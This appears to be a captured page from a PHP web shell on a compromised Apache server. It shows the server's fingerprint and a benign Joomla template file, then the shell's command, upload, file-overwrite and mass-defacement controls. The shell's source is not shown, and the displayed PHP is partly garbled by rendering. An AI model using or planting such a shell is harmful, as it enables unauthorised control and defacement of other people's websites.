ShellBanner
System:Linux MiraNet 3.0.0-14-generic-pae #23-Ubuntu SMP Mon Nov 21 22:07:10 UTC 2011 i686
Software:Apache. PHP/5.3.6-13ubuntu3.10
ID:uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
Safe Mode:OFF
Open_Basedir:OFF
Freespace:26.44 GB of 70.42 GB (37.55%)
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,

/ http/ guitar.1/ templates/ gk_party_freak/ html/ - drwxr-xr-x

Directory:
Viewing file:     modules.php (2.25 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 *
 * Framework module styles
 *
 * @version             1.0.0
 * @package             GK Framework
 * @copyright            Copyright (C) 2010 - 2011 GavickPro. All rights reserved.
 * @license                
 */
 
// No direct access.
defined('_JEXEC') or die;

/**
 * gk_style
 */
 
function modChrome_gk_style($module$params$attribs) {

$classes $params->get('moduleclass_sfx');

    
$badge '';
    
    while(
preg_match('/\bbadge-([^\s]+)/'$classes))

    {
        unset(
$matches);

        
$badge .= preg_match('/\bbadge-([^\s]+)/'$classes$matches) ? '<span class="badge">'.$matches[1].'</span>':'';
        
$classes substr($classesstrpos($classes$matches[0])+strlen($matches[0]));
         }
    if (!empty (
$module->content)) {
    
        echo 
'<div class="box' $params->get('moduleclass_sfx') . '">';
        
        if(
$module->showtitle) {
            
$part_one explode(' '$module->title);
            
$part_one $part_one[0];
            
            if(
count(explode(' '$module->title)) > 1) {
                
$part_two substr($module->titlestrpos($module->title,' '));
            } else {
                
$part_two '';
            }
            
            echo 
'<h3 class="header"><span>'.$part_one.'</span>'.$part_two.'</h3>'.$badge;
        }
        
        echo 
'<div class="content">' $module->content '</div>';
        echo 
'</div>';
     }
}

function 
modChrome_gk_style1($module$params$attribs) {
    if (!empty (
$module->content)) {
        
$badge preg_match('/badge/'$params->get('moduleclass_sfx')) ? '<span class="badge">badge</span>' '';
        echo 
'<div class="box' $params->get('moduleclass_sfx') . '">';
        
        if(
$module->showtitle) {
            
$part_one explode(' '$module->title);
            
$part_one $part_one[0];
            
            if(
count(explode(' '$module->title)) > 1) {
                
$part_two substr($module->titlestrpos($module->title,' '));
            } else {
                
$part_two '';
            }
            
            echo 
'<h3 class="header"><span>'.$part_one.'</span>'.$part_two.' &raquo;</h3>'.$badge;
        }
        
        echo 
'<div class="content">' $module->content '</div>';
        echo 
'</div>';
     }
}

function 
modChrome_gk_mobile($module$params$attribs) {
 if (!empty (
$module->content)) {
 echo 
'<div class="box' $params->get('moduleclass_sfx') . '">';

 if(
$module->showtitle) { 
 echo 
'<h3 class="header">' $module->title '</h3>';
 }

 echo 
'<div><div class="content">' $module->content '</div></div>';
 echo 
'</div>';
 }
}
Command:
Quick Commands:
Upload:
[OK] Max size: 100MB
PHP Filesystem: <@ Ú
Search File:
regexp
Create File:
Overwrite [OK]
View File:
Mass Defacement:
[+] Main Directory: [+] Defacement Url:
LmfaoX Shell - Private Build [BETA] - v0.1 -; Generated: 0.293 seconds